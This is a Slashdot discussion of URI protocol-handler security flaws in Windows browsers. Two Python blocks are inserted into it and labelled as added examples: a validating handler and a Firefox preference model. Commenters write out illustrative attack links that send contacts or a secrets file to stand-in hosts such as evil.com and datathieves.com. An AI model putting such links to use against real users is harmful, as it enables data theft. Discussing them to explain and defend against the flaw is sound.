    It would probably just be simpler to disable this functionality by default; I suspect not many people are really using their browser to launch other applications or do much beyond straightforward browsing (you konqueror people are something completely different!), or at least not to any meaningful extent. Where they are, some form of URI whitelist could do the job.

    I don't think browsers are going to stop being capable of launching applications overnight; I fully acknowledge that a lot of enterprise systems rely on this. But it can certainly be done more responsibly.

    1. Re:Responsible application launching by Opportunist · · Score: 1

      I don't think browsers are going to stop being capable of launching applications overnight

      Then how about letting me, the user, decide? Instead of simply activating everything, ask me whether I want a certain application to launch? I think I remember seeing something like this in a browser, forgot which one it was... FF, I think.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:Responsible application launching by Constantine+XVI · · Score: 1

      In Opera:

      click on a "special" link, like <URL:ed2k://|file|ubuntu-7.04-desktop-i386.[content.emule-project.net].iso|731797504|E239215147FA03E5DB3D6C816291BFCA|/> (If you look at that URI, it's for an ed2k download of Ubuntu 7.04)
      Opera says: "Would you like to open $PROGRAM to use this link?"

      --
      "I think an etch-a-sketch with an ethernet port would beat IE7 in web standards compliance."
    3. Re:Responsible application launching by Goaway · · Score: 0, Redundant

      Yes, because asking "Would you like to open Firefox to use this link?" is such a clear indication that your system is about to be hacked.

    4. Re:Responsible application launching by betterunixthanunix · · Score: 1
      Really? Because I use Konqueror's URI handlers for all of this: sftp, zip, tar, http, https, and ftp, and they are all useful. The problem with the Windows URI bug is that it allows an attacker to launch arbitrary programs, even programs without registered URI handlers, by passing arguments to certain registered programs (at least that is how I understand this vulnerability). It would be like using one of my KDE URI handlers to open a terminal; a malicious website could use that to start executing random commands on my system.

      The difference is that most Windows users are running as administrator, so an attacker could use this vulnerability to install something bad like a keystroke logger or some sort of worm, whereas they could only corrupt my home directory. This is just another example of why you shouldn't run as a superuser on a system connected to a public network...or any system at all.

      --
      Palm trees and 8
    5. Re:Responsible application launching by archen · · Score: 1

      Agreed, this is an extremely handy feature - especially when you consider the implications for integration with other applications. I created a database to track things on our network which worked pretty well. But then doing support remotely got to be a bit tedious since I would have to look up the info, cut and paste the computer name into $program, and so on. Now I can add handlers in firefox like rdesktop:// and vnc:// that allow it to fully integrate into a simple system.

      Better protections would be good, but I'd hate to see this functionality simply removed.

    6. Re:Responsible application launching by TheNicestGuy · · Score: 1

      What I find interesting is that Internet Explorer has, from the very beginning, had a little tab on its settings window to choose your preferred programs for the more common URI protocols like mail and news. So we've known for a long time that it is useful for browsers to be able to hand off non-http protocols to external programs, and that it's the sort of thing that a user might want to configure and customize themselves. How come these days it seems like all the management of that (in Windows at least) happens silently behind the scenes, and the user can't touch it without hacking the registry? Why hasn't the Programs tab of the Internet Options control panel evolved to a completely customizable list of protocol handlers, just the same as the one for file extensions? I haven't used Vista; does its infamous "allow or cancel" watchdog notify you of changes to your registered protocol handlers? It seems to me that the first step in dealing with these "browser flaws" is to bring this piece of the OS into the light and give the user control over it.

    7. Re:Responsible application launching by Goaway · · Score: 1

      Sarcasm is... redundant?

  8. What is the OS coverage? by pembo13 · · Score: 0, Redundant

    If this only works on Windows, then I feel fairly secure; I rarely keep important files on my Windows machine. If this works in Linux, then I'll have to leave Firefox off for awhile.

    --
    "Thanks for all the money you paid to us. We've used it to buy off ISO among other things" -Microsoft
    1. Re:What is the OS coverage? by mabinogi · · Score: 1

      "It" doesn't work anywhere, because "it" is nothing but random speculation that an application that has registered a URI handler _might_ have a bug in it.
      Sure, that's a pretty reasonable assumption, but it's idiotic to blame it on the URI handler stuff, the web browser, or the operating system.

      If there is such a bug in an application that has registered a custom URI, then any fault for any bug that may or may not exist lies squarely with the makers of that application.

      The title of this submission has nothing whatsoever to do with TFA.

      --
      Advanced users are users too!
    2. Re:What is the OS coverage? by IBBoard · · Score: 5, Interesting

      Only it's not that the application may have a bug, but that it may have an intentional feature that is useful for users that can then be exploited through a link. It might have less security than it should, but that's poor planning and not a bug.

      Take someone's earlier example of Skype. Let's assume you can do "skype --export-contacts --dest /some/path/here". Nice and useful for when you're migrating settings on your own desktop. Now assume that Skype also lets you export to your website so that you can publish it to your site, so you can put an HTTP URL in there. Now assume that users have complained about popups prompting them and that they want a batch mode that lets them export each night to make sure they never lose data - so it doesn't prompt.

      You'd now have something like "skype --export-contacts --dest http://www.example.com/mybackupscript --batch-mode". It does exactly what you want, you can archive your contacts, and you can even do it overnight to a remote location so it's accessible to you from anywhere and won't be lost in a disk crash. Only someone didn't secure it very well (again, bad implementation, not a bug) and someone somehow gets you to click on a link saying "skype:export-contacts&dest=http://www.evil.com/mybackupscript&batch-mode". That 'feature' is now being exploited to export your contacts to an arbitrary site without you even necessarily knowing.

      I'm sure there are lots of other similar alternatives, but the whole point is that it's badly validated input and not a bug. It's fairly sensible to have "skype:call-userid" as a link so that you can run up Skype and call someone. What it's not sensible to do is let that URI call do anything that can be done locally.

    3. Re:What is the OS coverage? by PhilHibbs · · Score: 1

      It doesn't have to be a bug, it just has to be a poorly-thought-out feature. For instance, a file transfer application that can be invoked from a handler, e.g. clicking sender:source=c:/secrets.txt?target=http://datathieves.com on a web page could invoke the "sender" handler application to send your secrets.txt to datathieves.com - is this a bug, or just a stupid application doing something unfortunate?

    4. Re:What is the OS coverage? by Anonymous Coward · · Score: 0

      but the whole point is that it's badly validated input and not a bug.

      Call me crazy, but isn't that just semantic nonsense? A program not validating input would seem like a bug to me...

    5. Re:What is the OS coverage? by aziraphale · · Score: 1

      Indeed - although I'd say that 'bad implementation' that leads to a 'security hole' qualifies as a bug. In fact, probably a priority one bug. But I'm picky about how the apps I ship treat their users' data.

      Easily mitigated, too, of course, because there's no rule that says that Skype's installer has to register the same executable as its protocol handler as it uses to handle user input at the command line. Use different executables, and the risk goes away. A small protocol handling exe that validates the input, extracts the information it needs, and uses it to launch the main Skype program is not going to be a huge additional component in an installation.

      Register a protocol handler in the Windows registry, and you're taking responsibility for handling any URL you're given that begins with that protocol. It's not that hard to understand. Why people keep on insisting this is somehow a flaw in Windows I don't know...
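      The "small protocol handling exe that validates the input" aziraphale describes, combined with IBBoard's rule above that a link must not be able to do everything the command line can, as an added example (not code from this thread, from Skype, or from any real handler): a hypothetical front end for a `skype:`-style scheme that accepts only `skype:call-<userid>` and forwards nothing else to the main program. The binary name `skype-main`, the action vocabulary and the user-id syntax are all assumptions made for the example.

```python
"""
Hypothetical validating front end for a custom "skype:"-style URI scheme.
Registered as the protocol handler instead of the full application, it
accepts exactly one action (call) with a strictly-shaped argument and
refuses everything else, so a web link cannot reach command-line features
such as exporting contacts to a remote destination.
"""
import re
import subprocess
from urllib.parse import unquote

SCHEME = "skype"
MAIN_PROGRAM = "skype-main"      # assumed name of the real application binary
ALLOWED_ACTIONS = {"call"}       # the only action a web link is allowed to trigger
MAX_URI_LEN = 256

# A user id must start with a letter or digit, so it can never be mistaken
# for a command-line switch, and may not contain ':', '/', '\\', '?', '&'
# or whitespace, so it can never name a path, a URL or a second option.
USERID_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,31}$")


class RejectedURI(ValueError):
    """Raised for any link the handler refuses to forward."""


def parse_handler_uri(uri: str) -> list[str]:
    """Turn a link URI into argv for the main program, or raise RejectedURI.

    Only "skype:call-<userid>" is accepted. The returned argv is a list, so the
    launcher never hands the argument to a shell for re-parsing.
    """
    if len(uri) > MAX_URI_LEN:
        raise RejectedURI("URI too long")

    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() != SCHEME:
        raise RejectedURI("unexpected scheme")

    # Decode percent-encoding once, then validate the decoded form, so that
    # %2D%2D cannot smuggle "--" past the checks below.
    rest = unquote(rest)
    if any(ord(c) < 0x20 or c == "\x7f" for c in rest):
        raise RejectedURI("control character in URI")

    action, sep, arg = rest.partition("-")
    if action not in ALLOWED_ACTIONS:
        raise RejectedURI(f"action not allowed from a link: {action!r}")
    if not sep or not USERID_RE.fullmatch(arg):
        raise RejectedURI("argument is not a plain user id")

    # The main program's own command line stays private: the handler builds
    # the argv itself rather than forwarding the link's text.
    return [MAIN_PROGRAM, "--call", arg]


def accepts(uri: str) -> bool:
    """True if the handler would forward this link, False if it rejects it."""
    try:
        parse_handler_uri(uri)
        return True
    except RejectedURI:
        return False


def launch(uri: str) -> int:
    """Validate the link and start the main program (list argv, no shell)."""
    argv = parse_handler_uri(uri)
    return subprocess.call(argv)


if __name__ == "__main__":
    # Constructed sample links: the two shapes from the thread plus edge cases.
    samples = [
        "skype:call-alice.smith",
        "skype:export-contacts&dest=http://www.evil.com/mybackupscript&batch-mode",
        "sender:source=c:/secrets.txt?target=http://datathieves.com",
        "skype:call-%2D%2Dexport-contacts",
        "skype:call-alice/../secrets",
    ]
    for s in samples:
        try:
            print("forward", parse_handler_uri(s))
        except RejectedURI as e:
            print("reject ", s, "->", e)
```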

    6. Re:What is the OS coverage? by IBBoard · · Score: 1

      I was talking to a work-mate after posting that and he said a similar thing - it depends what you class as a bug, it could be a security bug.

      IMO it wouldn't be a bug. To me a bug is something that shouldn't be happening, full stop. e.g. ability to inject data (as you can with a bad PHP script, register global variables and a specially constructed query string), ability to corrupt data or cause crashes (as you can do with a buffer overflow) or ability to bypass a security measure through some simple means (like my college's web filtering software that let you get to blockedexample.com by going to something like http://example.com/).

      This, on the other hand, is just lax security or bad separation in design. It might be functionality that you want on the whole and hence a feature (as in my example) but to me registering the whole EXE is a bad choice, not checking the input when invoked in that way (if it's possible) is a bad choice, allowing the data sending without confirmations was potentially a bad choice, and so on.

      Having said all that then I would still expect it to turn up in a bug tracking app ;) But phpBB have a separate "security bug tracker".

    7. Re:What is the OS coverage? by IBBoard · · Score: 1

      IMO, only when it leads to unexpected behaviour. In this situation it might be expected behaviour, but behaviour that shouldn't sensibly have been made public. That makes it a security issue and a bad design decision, but not necessarily a bug (under my interpretation of 'bug' in software)

      See http://it.slashdot.org/comments.pl?sid=271163&threshold=-1&commentsort=0&mode=thread&pid=20248365#20248719 for my longer response.

  9. Whew... by Spy+der+Mann · · Score: 4, Funny

    Good thing I use Firefox and not that "URI browser". I feel safe.

    1. Re:Whew... by Carthag · · Score: 1

      Don't be too careless. Apparently the URI Browser can be tricked into sending malicious data to Firefox!!

  10. Yeah, yeah by nagora · · Score: 1, Flamebait

    It'll be a cold day in hell before I take security advice from a bunch of crooks like Ernst & Young. Presumably there's some obscure way they can make money out of this announcement.

    --
    "Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
  11. Re:Microsoft do it again by MrNaz · · Score: 1, Funny

    Hey numbnuts, I know this is /. but there is nothing that MS can do to help this, nor anything they can do to mitigate the harm. Cut it out with the vitriol. You idiots have such double standards and it's starting to make me sick. When MS does it, it gets labeled FUD. When you do it it gets labeled +1 Insightful. I mean FFS, lets cut out the crap. Now go ahead. Mod me down. I got karma to burn. Fuckers.

    --
    I hate printers.
  12. OT by Opportunist · · Score: 1

    Mind if I linked to your journal entry next time I need to write something about security? It would save me a lot of typing...

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    1. Re:OT by Spy+der+Mann · · Score: 1

      Mind if I linked to your journal entry next time I need to write something about security?

      sure, Opportunist. (pun intended)

    2. Re:OT by Spy+der+Mann · · Score: 1

      p.s. I updated my journal. Here's the php security mistakes entry.

  13. Better late than never by Anonymous Coward · · Score: 0

    showed how a browser could be tricked into sending malformed data to Firefox

    Oh shit. I had better switch to IE then!

  14. Custom prefixes... blah! by billcopc · · Score: 2, Interesting

    This is just an expansion (or rehash) of the exploit using custom "protocol" prefixes (the http:/// part). Now I must be on different intertubes than the rest of y'all, because I hardly ever (read: never) see anything but http, ftp and mailto in the links I use, and I build both public (as in gimmicky) web sites and business apps for a living. Anything else should be handled by a browser PLUGIN, not some creaky registry hack that can spawn any random process. The difference should be obvious: you can have a thousand executables on a PC, but probably less than a dozen browser plugins, making it a lot easier to spot suspicious bits.

    Why do we need so many bizarre launchers anyway ? Do people really click funky URIs in IE7 to launch the copy of Firefox that's already installed on their system ? How about a desktop icon, you stupid shits!

    --
    -Billco, Fnarg.com
  15. A microsoft education for end users by bl8n8r · · Score: 1

    > Microsoft is working to educate users and developers about these security issues

    Yep. We know all about Microsoft's education*:

    In no event shall microsoft or its suppliers be liable for any special, incidental, punitive, indirect, or consequential damages whatsoever (including, but not limited to, damages for loss of profits or confidential or other information, for business interruption, for personal injury, for loss of privacy, for failure to meet any duty including of good faith or of reasonable care, for negligence, and for any other pecuniary or other loss whatsoever)

    [*] - http://www.microsoft.com/windowsxp/home/eula.mspx

    --
    boycott slashdot February 10th - 17th check out: altSlashdot.org
    1. Re:A microsoft education for end users by BSDetector · · Score: 0

      Hey smartie! - why didn't you also post portions of a similar Apple EULA

      Limitation of Liability. To the extent not prohibited by law, in no event shall apple be liable for personal injury, or any incidental, special, indirect or consequential damages whatsoever, including, without limitation, damages for loss of profits, loss of data, business interruption or any other commercial damages or losses, arising out of or related to your use or inability to use the apple software, however caused, regardless of the theory of liability (contract, tort or otherwise) and even if apple has been advised of the possibility of such damages. Some jurisdictions do not allow the limitation of liability for personal injury, or of incidental or consequential damages, so this limitation may not apply to you. In no event shall Apple's total liability to you for all damages (other than as may be required by applicable law in cases involving personal injury) exceed the amount of fifty dollars ($50.00). The foregoing limitations will apply even if the above stated remedy fails of its essential purpose.

      I would have posted it as is but the original posting was full of CAPS and /. aborted the post using its "Lameness" filter (Reason: Don't use so many caps. It's like YELLING.). I guess that Apple is lame then. Go ahead - mod me down!

  16. Print Friendly Version by Anonymous Coward · · Score: 0

    print friendly version for those who prefer to read TFA that way.

  17. Damn! by rdrd · · Score: 2, Funny

    I just pressed on that "slashdot://it.slashdot.org" link !!!

  18. 202c by unforkable · · Score: 0, Offtopic

    Thus some regular expressions are verboten in Germany !

  19. Care to provide details? by brunes69 · · Score: 1

    Is your "working example" remotely installable?

    I am anxious to see how these guys plan to remotely install a URI handler into the registry without any user intervention, unless they are using some other remote exploit, in which case THAT is the actual bug.

    1. Re:Care to provide details? by Anonymous Coward · · Score: 2, Insightful

      For those living under a rock: Many applications, including Firefox, install URI handlers by default. Many applications, including Firefox, have no or insufficient safeguards against dangerous URIs which are passed to them that way. Many applications, which render arbitrary remote data, can activate URI handlers with arbitrary URIs, often with no or trivial user interaction. If you think that is fine, you shouldn't dispense security advice.

    2. Re:Care to provide details? by Alphager · · Score: 1

      The thing is: URIs are handled by the OS (in this case: Windows). It does not matter if you use Firefox, Internet Explorer, Word or OpenOffice: They all use the system's URI-handler.

    3. Re:Care to provide details? by Anonymous Coward · · Score: 0

      So Windows offers a facility for registering and calling URI handlers. That doesn't mean that applications should accept any strange URI through that facility, or use that facility at all. If you accept dangerous URIs, you can't accept them from anywhere. If you accept URIs from everywhere, you have to make sure they're not dangerous. It's hard to get that right, which makes the whole URI handler concept dangerous.

    4. Re:Care to provide details? by IBBoard · · Score: 1

      It doesn't seem to need to be remotely installable. Reading the article (!) mentions that there's a developer's piece of software that's apparently vulnerable to sending out data via this method. That means it can be any badly designed software like AIM or Skype or anything else that could potentially legitimately register itself as a protocol handler that could be the target of this.

      Granted, that means that exploits using it wouldn't work on people without that specific app installed or with the protocol handling removed, but then isn't it the same with spam and current exploits? Sending the spam/virus to everyone or probing as many computers as possible doesn't rely on it working for everyone, just on it working for some people and that those "some people" are sufficiently numerous.

    5. Re:Care to provide details? by Opportunist · · Score: 2, Informative

      Basically what it does is to make an assumption that a certain application exists on your system. An application that's exploitable through the use of malformed links, or malformed data hitting the application when you follow that link. Certainly, you are perfectly safe if you do not happen to have this application installed.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    6. Re:Care to provide details? by Anonymous Coward · · Score: 0

      Try running this telnet://.doc
      Word is launched....

    7. Re:Care to provide details? by Anonymous Coward · · Score: 0

      Uhmmm, no

      actually that launches telnet... unlike you I tested the link before posting.

      smooches! ;)

  20. It's called a URI by brunes69 · · Score: 3, Insightful

    It's part of the protocol. Any link on any web page should be able to specify ANY protocol.

    Is anyone complaining that Konqueror can handle links like sftp://root@someftpsite ?

    The whole article is stupid. It is going to come out that this is not remotely exploitable unless you use another remote exploit to install the 3rd party protocol handler.

    Non story.

  21. Re:Here it is by SolitaryMan · · Score: 1

    This is a clear indication of the problem being Windows only:

    ...Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox.

    Guess what is this mysterious "browser" thing.

    --
    May Peace Prevail On Earth
  22. Re:Microsoft do it again by Anonymous Coward · · Score: 0

    "You idiots have such double standards and it's starting to make me sick."

    Patient: Doctor, doctor! It hurts when I raise my arm.
    Doctor: Then don't raise your arm.

  23. Nice to have features by realmike · · Score: 1

    Development of great software must include a process to review and cut down on features in each release. Otherwise it becomes feature bloat and becomes ugly and dangerous.

    Mike | Optimalprint

  24. Re:Microsoft do it again by Anonymous Coward · · Score: 3, Informative

    Don't forget Mac and Linux. The ability to register a custom protocol handler to launch programs in the OS is standard. The ability to reference said protocol handler in a hyperlink is also standard. These problems affect every (major) OS.

    MacOSX has had a number of vulnerabilities due to URI handling:

    Daring Fireball - Using the 'telnet' URI Protocol to Delete Files
    Mac OS X Volume URI Handler Registration Code Execution Vulnerability
    Apple Mac OS X SSH URI Handler Remote Code Execution Vulnerability

    As long as you can get a browser to pass arbitrary data to an application you will be vulnerable. What needs to happen is that the custom protocol handlers should be white-listed by default requiring the user to explicitly allow a new protocol handler. Any protocol handler not handled directly by the browser should display a dialog to inform the user of the action and permit them to cancel it. The user needs to be aware that they're not clicking on a "normal" hyperlink.

    Ultimately I think the only way to really mitigate these kinds of security problems is to sandbox or virtualize the browser, which is actually what MS has done with IE7 in Vista. Vulnerabilities are inevitable so the OS and browser should do what it can to limit the extent of the damage that can be caused.

  25. Anti-MS Zealotry betrays us all by Anonymous Coward · · Score: 0

    Remember all those people who whine and complain about IE not following their arbitrary standards? Seems like MS doing things right rather than listening to the fools in the standards bodies has protected users of the most stable and most used browser (and now by far the most secure browser).

    Standards can be a good thing, but only when you have everyone doing things the right way. All these chumps push is having everyone do things the stupid way... but they are more interested in making MS do what they say than they are in innovation. Or security.

    1. Re:Anti-MS Zealotry betrays us all by Magic5Ball · · Score: 1

      From the article (and not mentioned at all in the summary for some reason):

      'These URI issues are complicated, even for software developers. Mozilla Corp. initially thought that Larholm's bug needed Internet Explorer in order to be triggered, but this assessment turned out to be wrong, and two weeks later the Firefox team was forced to patch the same problem. "If an organization like Mozilla is having issues with understanding how a URI handler increases the scope and the attack surface of their applications, think about how hard it is for a small development shop," McFetters said.

      Microsoft is working to educate users and developers about these security issues, but there's only so much that it can do, said Mark Griesi, a security program manager with Microsoft.'

      --
      There are 1.1... kinds of people.
  26. It's the Usual M$ Sabotage and FUD. by twitter · · Score: 1, Insightful

    Important details have been obscured on purpose to FUD Mozilla. I'm surprised they bothered to point out it's Windoze only in the first paragraph, but here's the glaring part of the FUD:

    Microsoft is working to educate users and developers about these security issues, but there's only so much that it can do, said Mark Griesi, a security program manager with Microsoft. "Security is an industry responsibility and this is certainly a case of that [principle]," he said. "It's not Microsoft's position to be the gatekeeper of all third-party applications."

    Yet, we know that this problem was created by IE7 and does not show up on Mac or gnu/linux. Par for the course, create a problem and then blame the victim. Where have we seen this kind of M$ attack before? All over, and court proved in the anti-trust case and also in the DRDOS case.

    --

    Friends don't help friends install M$ junk.

    1. Re:It's the Usual M$ Sabotage and FUD. by Macthorpe · · Score: 2, Informative

      And yet this problem would be solved if Firefox didn't register a URI at all. Or it actually vetted data that was passed to that URI.

      Surprisingly it's not a problem if Firefox isn't installed.

      --
      "It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
    2. Re:It's the Usual M$ Sabotage and FUD. by The+Bungi · · Score: 1

      twitter, I'm sure anyone who reads Slashdot would be keenly interested in any specific information you have to share about this, so please specify exactly how Microsoft is sabotaging Firefox here.

  27. Oh yeah. by twitter · · Score: 1

    if it ain't broke, don't start shoe-horning new and unsecured protocol-handling into the registry.

    Because we all know what a tight machine M$ gave us without help from firefox. Wake me up when this is more than a Windoze problem.

    --

    Friends don't help friends install M$ junk.

  28. Want to disable it altogether? by Anonymous Coward · · Score: 4, Informative

    Go to about:config and

    set network.protocol-handler.expose-all to false,
    network.protocol-handler.expose.http to true,
    network.protocol-handler.expose.javascript to true,
    network.protocol-handler.expose.mailto to true and
    remove all other network.protocol-handler.expose.* entries (or set them to false).

    Set network.protocol-handler.external-default to false,
    network.protocol-handler.external.mailto to true and
    remove all other network.protocol-handler.external.* entries (or set them to false).

    To be sure set network.protocol-handler.warn-external.file to true and
    remove all network.protocol-handler.warn-external.* entries (or set them to true).

    For more info start at http://kb.mozillazine.org/Network.protocol-handler.expose-all
    Beware, on Windows things are different. See http://kb.mozillazine.org/Register_protocol
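To see how those preferences combine, here is an added Python model of the lookup (not code from the thread or from Mozilla). It encodes the precedence documented on the mozillazine page linked above: a per-scheme pref (expose.<scheme>, external.<scheme>, warn-external.<scheme>) overrides the global one (expose-all, external-default, warn-external-default), and the built-in default for all three globals is true. The allow-lists INTERNAL_ALLOWED and EXTERNAL_ALLOWED, the stray_allows check and the user.js rendering are my additions; the scheme names tried in the main block are illustrative.

```python
"""Model of how Firefox resolves its network.protocol-handler.* preferences.

Added example for the lockdown described in the comment above; it is not
code from the thread or from Mozilla.  Precedence (per the mozillazine KB):
a per-scheme pref overrides the matching global pref, and every global
defaults to true when unset.
"""
from dataclasses import dataclass

PREFIX = "network.protocol-handler."


@dataclass(frozen=True)
class Decision:
    exposed: bool   # web content may reference the scheme at all
    external: bool  # Firefox may hand the URI to an external application
    warn: bool      # the user is prompted before that hand-off


def _lookup(prefs: dict, specific: str, global_pref: str, builtin: bool) -> bool:
    """Per-scheme pref wins; else the global pref; else Firefox's built-in default."""
    if specific in prefs:
        return bool(prefs[specific])
    return bool(prefs.get(global_pref, builtin))


def decide(scheme: str, prefs: dict) -> Decision:
    """What Firefox would do with a link whose scheme is `scheme` under `prefs`."""
    s = scheme.lower()
    return Decision(
        exposed=_lookup(prefs, f"{PREFIX}expose.{s}", f"{PREFIX}expose-all", True),
        external=_lookup(prefs, f"{PREFIX}external.{s}", f"{PREFIX}external-default", True),
        warn=_lookup(prefs, f"{PREFIX}warn-external.{s}", f"{PREFIX}warn-external-default", True),
    )


def launches_external(scheme: str, prefs: dict) -> bool:
    """An outside program only ever runs if the scheme is both exposed and allowed external."""
    d = decide(scheme, prefs)
    return d.exposed and d.external


# The comment's allow-list (assumed here; note it does not include https).
INTERNAL_ALLOWED = ("http", "javascript", "mailto")
EXTERNAL_ALLOWED = ("mailto",)


def lockdown_prefs(internal=INTERNAL_ALLOWED, external=EXTERNAL_ALLOWED) -> dict:
    """Deny-by-default policy from the comment: globals off, named schemes re-enabled."""
    prefs = {
        f"{PREFIX}expose-all": False,
        f"{PREFIX}external-default": False,
        f"{PREFIX}warn-external-default": True,
    }
    for s in internal:
        prefs[f"{PREFIX}expose.{s}"] = True
    for s in external:
        prefs[f"{PREFIX}external.{s}"] = True
    return prefs


def stray_allows(prefs: dict, internal=INTERNAL_ALLOWED, external=EXTERNAL_ALLOWED) -> list:
    """Per-scheme prefs that re-enable a scheme outside the allow-list.

    These are the 'remove all other ... entries' items from the comment: a
    leftover expose.foo=true or external.foo=true silently wins over the globals.
    """
    stray = []
    for key, value in prefs.items():
        if not key.startswith(PREFIX) or not value:
            continue
        rest = key[len(PREFIX):]
        for kind, allowed in (("expose.", internal), ("external.", external)):
            if rest.startswith(kind) and rest[len(kind):] not in allowed:
                stray.append(key)
    return sorted(stray)


def to_user_js(prefs: dict) -> str:
    """Render the policy as user.js lines for the profile directory."""
    return "".join(
        f'user_pref("{k}", {"true" if v else "false"});\n' for k, v in sorted(prefs.items())
    )


if __name__ == "__main__":
    policy = lockdown_prefs()
    print(to_user_js(policy))
    for scheme in ("http", "mailto", "firefox", "outlook"):  # illustrative schemes
        print(scheme, decide(scheme, policy), "external launch:", launches_external(scheme, policy))
```

The emitted lines can go into a user.js in the profile directory or be set one by one in about:config. stray_allows is the check for the "remove all other entries" steps: with the stock prefs every scheme is both exposed and handed out externally, and a single forgotten per-scheme true restores that for its scheme no matter what the globals say.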

  29. Must be said by a.d.trick · · Score: 1

    Yes, but does it run on Linux :)

  30. Re:Microsoft do it again by crumley · · Score: 1

    What do you consider to be the Linux standard for registering URI schemes? Mailcap? Facilities specific to KDE or Gnome, like those provided in Konqueror? Or Firefox's helper application registration?

    I don't think Linux is immune to this sort of problem, but it seems like this is one place where the diversity of the desktop on Linux helps quite a bit. I am having a hard time coming up with a realistic way for this to be a problem for a user who runs Windowmaker or FVWM and doesn't install software from really odd sources.

    --
    Preventive War is like committing suicide for fear of death. - Otto Von Bismarck
  31. It's not stupid. by argent · · Score: 2, Interesting

    The problem is that there's no way on Windows or OSX to register a protocol handler for shell programs (Finder, Windows Explorer, the KDE file manager) or applications' internal use (help: on both Windows and OSX) without it also being available to the web browsers. This means that any application that isn't designed to deal with untrusted input that the browser developer hasn't yet explicitly blocked is a point of entry.

    Exploits using this approach have been found via IE since 1997, and via Safari since 2004.

    1. Re:It's not stupid. by brunes69 · · Score: 1

      And in Konqueror since it was written, since it is designed this way.

      It is not the web browser's job to validate input into external URI handlers. It is the URI handler's job.

  32. This is ten years old news! by argent · · Score: 1

    I've been talking about this kind of problem in Windows and the HTML control since the late '90s, and in OSX and LaunchServices since 2004. It's worse in Windows, because you have the same stupid lack of security design in ActiveX which is a much harder nut to crack...

    http://www.scarydevil.com/~peter/io/apple.html and later posts in http://www.scarydevil.com/~peter/io/ ...

  33. PS... by argent · · Score: 1

    The articles on my site are primarily about Apple, mostly because Microsoft has similar vulnerabilities discovered at far too great a rate for me to keep up. There was a patch for another one (an ActiveX component used by other programs not being explicitly blocked by the HTML control) on Tuesday.

  34. Re:Here it is by Fred_A · · Score: 1

    This is the clear indication of the problem being Windows only:

    ...Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox.

    Guess what this mysterious "browser" thing is.

    Are you trying to subtly imply that it isn't Opera? Why, I am shocked! ;)
    --

    May contain traces of nut.
    Made from the freshest electrons.
  35. MS ducks responsibility again....no surprise. by CodeShark · · Score: 1

    Griesi said that he does not see any of these URI issues as something that needs to be fixed in Windows or Internet Explorer. That's up to the individual software developers whose programs may be misused... "It's not Microsoft's position to be the gatekeeper of all third-party applications."

    Except that as far as I can tell, it's the WinXX OS kluges that are allowing the security breaches to access system resources. Correct me if I am wrong, but wasn't it a Mr. Bill Gates who told the world that security was now the #1 priority at Microsoft a few years back?

    Companies that speak with forked tongues deserve to have said tongue cut off, don't you think?

    --
    ...Open Source isn't the only answer -- but it's almost always a better value than the alternatives...
  36. PPS: the last paragraph is 100% wrong... by argent · · Score: 1

    Griesi said that he does not see any of these URI issues as something that needs to be fixed in Windows or Internet Explorer. That's up to the individual software developers whose programs may be misused. "Security is an industry responsibility and this is certainly a case of that [principle]," he said. "It's not Microsoft's position to be the gatekeeper of all third-party applications."

    100% wrong. Microsoft doesn't provide a mechanism for applications to create both secure URI handlers for browsers as well as shell URIs for internal use. If they did, if they had a way to register components (URI handlers, file type handlers, Plugins, ActiveX controls, and so on) for use by shells (eg, Windows Explorer) only, or for use by browsers only, then we would have seen significantly fewer exploits on Windows over the past decade.

    This is harder for Microsoft to fix than for Apple to fix, because in Windows the HTML control is the gatekeeper... not the application. Apple hasn't integrated Webcore as far as IE, and since Webcore is based on KHTML it's using the inherently secure IO Slave model rather than leaving it up to the HTML display engine to try and guess what plugins should be allowed.

    But it DOES need to be fixed on both platforms.

  37. Re:Microsoft do it again by MrNaz · · Score: 1

    AC: Mod, mod! I have something insightful to say!
    Mod: Shut up, post under your name or get lost.

    --
    I hate printers.
  38. My Nephew has to choose his major soon by infonography · · Score: 0, Offtopic

    He has been in Preschool now for 5 months. Pretty soon they will want him to pick either Arts (Fingerpainting or Crayon), Science (Frogs) or Culinary Arts (Mudpies).

    Life is tough for the modern Two Year Old.

    --
    Sorry about the writing. Robot fingers, you know? Cliff Steele in DOOM PATROL #23
    1. Re:My Nephew has to choose his major soon by szrachen · · Score: 1

      Does he need to do that because of this URI Browser exploit? Inquiring minds would like to know.

      Er... Wait a minute! Excuse me sir, I believe that you are replying to the wrong story.

  39. Punishment for browser developers by Animats · · Score: 1

    Write 100 times on the whiteboard:

    I will not launch applications from the browser.
    I will not launch applications from the browser.
    I will not launch applications from the browser.
    I will not launch applications from the browser.
    I will not launch applications from the browser.
    I will not launch applications from the browser.

  40. Problem is not Firefox. by twitter · · Score: 2, Informative

    M$ Defender, Macthorpe claims what M$ won't directly:

    Surprisingly it's not a problem if Firefox isn't installed.

    Not even this highly spun article goes that far.

    Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox using this technology. This bug allowed an attacker to run unauthorized software on a victim's PC. Later, other researchers, including Rios and McFetters, showed how other browsers and applications could be misused to achieve similar goals.

    So IE, mentioned as "a browser", sends the crap to Firefox and will do the trick on its own. Also, as we have seen before, this was not a problem before IE7.

    --

    Friends don't help friends install M$ junk.

    1. Re:Problem is not Firefox. by Macthorpe · · Score: 0

      How can IE do the trick without Firefox installed? Why is Firefox accepting bad data via its URI? Any application could be sending it that data, and it would have still accepted it.

      Can you explain how this security problem would exist if Firefox wasn't installed?

      --
      "It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
    2. Re:Problem is not Firefox. by twitter · · Score: 1

      How can IE do the trick without Firefox installed?

      By using the same URI Windows calls Firefox on Windows uses. Those would probably be the ones downgraded by IE7 that created the problem in the first place. This explains why there was no problem before IE7 and the nebulous assertion that other "browsers and applications" have the same problem. Chances are that this is going to balloon out to anything web enabled on Windoze.

      --

      Friends don't help friends install M$ junk.

    3. Re:Problem is not Firefox. by Macthorpe · · Score: 1, Informative

      By using the same URI Windows calls Firefox on Windows uses.

